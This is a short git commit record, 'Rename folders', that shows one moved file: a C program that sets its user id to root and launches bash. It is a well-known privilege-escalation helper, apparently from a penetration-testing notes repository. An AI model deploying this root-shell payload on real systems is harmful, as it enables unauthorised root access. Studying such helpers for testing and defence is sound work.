Rename folders

This commit is contained in:
Mo Langning
2024-04-05 10:42:21 +00:00
parent 997dca7afc
commit 73f78c4133
271 changed files with 0 additions and 0 deletions
@@ -0,0 +1,10 @@
// $ gcc -o root-shell2 root-shell2.c
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}